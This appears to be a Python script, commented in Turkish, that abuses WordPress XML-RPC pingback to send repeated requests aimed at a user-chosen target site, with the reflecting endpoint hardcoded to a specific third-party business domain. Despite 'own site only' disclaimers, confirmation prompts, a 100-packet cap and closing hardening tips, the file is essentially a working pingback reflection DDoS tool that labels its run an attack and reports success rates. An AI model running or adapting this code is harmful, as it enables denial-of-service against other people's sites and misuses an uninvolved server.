#!/usr/bin/env python3"""XML-RPC Pingback DDoS Test ScriptiSADECE KENDİ SİTENİZİ TEST ETMEK İÇİNDİR!"""import requestsimport timeimport sysfrom requests.packages.urllib3.exceptions import InsecureRequestWarning# SSL warning'leri kapatrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)def send_pingback_attack(target_site, source_site, count, delay=0.5):    """    Pingback DDoS testi yapar        Args:        target_site: DDoS yapılacak hedef site        source_site: Pingback'in kaynağı olarak gösterilecek site        count: Kaç paket gönderilecek        delay: Paketler arası bekleme süresi (saniye)    """    xml_template = '''xml version="1.0"<methodCall><methodName>pingback.ping</methodName><params><param><value><string>{target}</string></value></param><param><value><string>{source}</string></value></param></params></methodCall>'''        print("\n" + "="*60)    print("🚀 XML-RPC PINGBACK DDoS TESTİ")    print("="*60)    print(f"[🎯] HEDEF SİTE: {target_site}")    print(f"[📡] KAYNAK SİTE: {source_site}")    print(f"[📦] PAKET SAYISI: {count}")    print(f"[⏱️]  DELAY: {delay} saniye")    print("="*60)        # UYARI MESAJI    print("\n⚠️  UYARI: Bu script sadece EĞİTİMSEL amaçlıdır!")    print("⚠️  Sadece KENDİ SİTENİZİ test edebilirsiniz!")    print("⚠️  Başkalarının sitelerine saldırmak YASAKTIR!")        onay = input("\n⚠️  Devam etmek istiyor musunuz? (Evet/Hayır): ").strip().lower()        if onay not in ['evet', 'e', 'yes', 'y']:        print("[❌] İptal edildi!")        return        print("\n" + "="*60)    print("[⚡] SALDIRI BAŞLIYOR...")    print("="*60)        success_count = 0    fail_count = 0        for i in range(1, count + 1):        xml_data = xml_template.format(target=target_site, source=source_site)                try:            # XML-RPC isteği gönder            response = requests.post(                "https://balcovaesseguzellikmerkezi.com/xmlrpc.php",                data=xml_data,                headers={"Content-Type": "text/xml"},                timeout=10,                verify=False            )                        # Sonucu analiz et            if response.status_code == 200:                if 'faultCode' in response.text:                    # Pingback başarısız ama method çalıştı                    success_count += 1                    status = "Method ÇALIŞTI (Pingback failed)"                else:                    # Pingback başarılı                    success_count += 1                    status = "Pingback BAŞARILI!"            else:                fail_count += 1                status = f"HTTP {response.status_code}"                        # İlerleme göster            print(f"[{i}/{count}] Paket gönderiliyor... {status}")                        # Delay            if i < count:                time.sleep(delay)                        except KeyboardInterrupt:            print("\n\n[⏹️] Kullanıcı tarafından durduruldu!")            break        except Exception as e:            fail_count += 1            print(f"[{i}/{count}] HATA: {str(e)[:50]}")            continue        # SONUÇ RAPORU    print("\n" + "="*60)    print("📊 SALDIRI SONUÇ RAPORU")    print("="*60)    print(f"✅ Başarılı istekler: {success_count}")    print(f"❌ Başarısız istekler: {fail_count}")    print(f"📈 Başarı oranı: {(success_count/(success_count+fail_count))*100:.1f}%")        if success_count > 0:        print("\n🔴 DDoS AÇIĞI TESPİT EDİLDİ!")        print(f"   Siteniz {success_count} pingback isteği gönderebildi.")        print("   ⚠️  ACİL: XML-RPC'yi HEMEN kapatın!")        print("   📝 Öneri: .htaccess ile xmlrpc.php'yi engelleyin")    else:        print("\n🟢 DDoS AÇIĞI BULUNAMADI")        print("   Siteniz pingback isteklerine yanıt vermiyor.")        print("\n" + "="*60)def main():    print("🛡️  XML-RPC PINGBACK DDoS TEST SCRIPTI")    print("🛡️  Sadece eğitim amaçlıdır!")    print("="*60)        # Kullanıcıdan bilgileri al    print("\n[1] HEDEF SİTE (DDoS yapılacak site):")    print("    Örnek: https://example.com")    target_site = input("    Hedef site URL: ").strip()        print("\n[2] KAYNAK SİTE (Pingback'in kaynağı):")    print("    Not: Genelde kendi sitenizi kullanın")    source_site = input("    Kaynak site URL: ").strip()        print("\n[3] PAKET SAYISI:")    print("    Not: Çok yüksek sayılar sitenizi yavaşlatabilir")    try:        count = int(input("    Kaç paket gönderilsin? (1-100): ").strip())        count = max(1, min(100, count))  # 1-100 arası sınırla    except:        print("    [!] Geçersiz sayı! Varsayılan: 10")        count = 10        print("\n[4] DELAY (Paketler arası bekleme):")    print("    Not: 0.1 = hızlı, 1.0 = yavaş")    try:        delay = float(input("    Delay (saniye): ").strip())        delay = max(0.1, min(5.0, delay))  # 0.1-5 arası sınırla    except:        print("    [!] Geçersiz delay! Varsayılan: 0.5")        delay = 0.5        # Saldırıyı başlat    send_pingback_attack(target_site, source_site, count, delay)        # Güvenlik önerisi    print("\n🔐 GÜVENLİK ÖNERİLERİ:")    print("   1. XML-RPC'yi .htaccess ile kapatın")    print("   2. WordPress güncelleyin")    print("   3. Güvenlik eklentisi kurun (Wordfence)")    print("   4. Düzenli yedek alın")    print("="*60)if __name__ == "__main__":    try:        main()    except KeyboardInterrupt:        print("\n\n[👋] Script sonlandırıldı!")        sys.exit(0)